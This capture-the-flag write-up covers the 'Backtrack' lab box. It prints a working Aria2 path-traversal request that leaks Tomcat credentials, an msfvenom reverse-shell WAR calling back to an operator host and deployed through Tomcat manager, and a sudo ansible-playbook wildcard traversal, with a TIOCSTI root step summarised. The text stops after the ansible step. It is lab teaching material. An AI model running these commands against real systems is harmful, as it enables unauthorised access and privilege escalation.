Case file

Aria2 LFI, Tomcat WAR deploy, and Ansible path traversal

Foundations Linux engagement: CVE-2023-39141 on Aria2 disclosed Tomcat credentials; WAR deploy yielded tomcat; sudo ansible-playbook wildcards pivoted to wilbur; internal gallery upload and TTY pushback completed root.

Foundations32 minLinux · Path Traversal · Tomcat · Privilege Escalation
  • Aria2 path traversal leaked tomcat-users.xml. Manager-script WAR deploy opened a shell; ansible sudo wildcards and an internal upload chain reached root via TTY injection.

  • Path traversal read tomcat-users.xml; WAR deploy returned a reverse shell as tomcat.

  • Path traversal under /opt/test_playbooks/*.yml executed an attacker playbook as wilbur.

  • Tunneled gallery upload as orville; .bashrc TIOCSTI planted SUID bash when root su’d without -P.

01

Engagement summary

Aria2 path traversal leaked tomcat-users.xml. Manager-script WAR deploy opened a shell; ansible sudo wildcards and an internal upload chain reached root via TTY injection.

BACKTRACK (backtrack.thm) exposed Tomcat on 8080 and Aria2 WebUI on 8888. CVE-2023-39141 path traversal read /opt/tomcat/conf/tomcat-users.xml (tomcat / OPx52k53D8OkTZpx4fr, manager-script). A msfvenom WAR deployed via manager/text gave a tomcat shell. sudo -l allowed ansible-playbook /opt/test_playbooks/*.yml as wilbur — path traversal to /dev/shm/shell.yml pivoted. wilbur’s notes held orville gallery credentials; SSH tunnel to localhost:80 plus double-encoded upload traversal yielded orville. Root periodically ran su - orville without -P; TIOCSTI pushback via .bashrc planted SUID bash.

Business impact

Unauthenticated Aria2 file disclosure is credential theft. Tomcat manager-script without network controls is RCE. Sudo wildcards on ansible-playbook and TTY injection on shared sessions are root. Patch Aria2, lock Tomcat manager, pin playbook paths, and use su -P / sudo -i for privileged switches.

02

Aria2 LFI and Tomcat WAR RCE

Path traversal read tomcat-users.xml; WAR deploy returned a reverse shell as tomcat.

OPERATOR · ARIA2 / TOMCAT

savvy@lab:~$ echo '10.48.132.202 backtrack.thm' | sudo tee -a /etc/hosts

savvy@lab:~$ curl --path-as-is 'http://backtrack.thm:8888/../../../../../../opt/tomcat/conf/tomcat-users.xml'

tomcat / OPx52k53D8OkTZpx4fr role=manager-script

savvy@lab:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=OPERATOR_IP LPORT=4444 -f war -o exploit.war

savvy@lab:~$ nc -lnvp 4444

savvy@lab:~$ curl -u tomcat:OPx52k53D8OkTZpx4fr --upload-file exploit.war "http://backtrack.thm:8080/manager/text/deploy?path=/foo&update=true"

savvy@lab:~$ curl http://backtrack.thm:8080/foo/

savvy@lab:/$ id

03

Ansible wildcard to wilbur

Path traversal under /opt/test_playbooks/*.yml executed an attacker playbook as wilbur.

PAYLOAD

shell.yml

- hosts: localhost
  tasks:
    - shell: /bin/sh /dev/tty 2>/dev/tty

OPERATOR · ANSIBLE

savvy@lab:~$ sudo -l

(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml

savvy@lab:~$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../dev/shm/shell.yml

savvy@lab:~$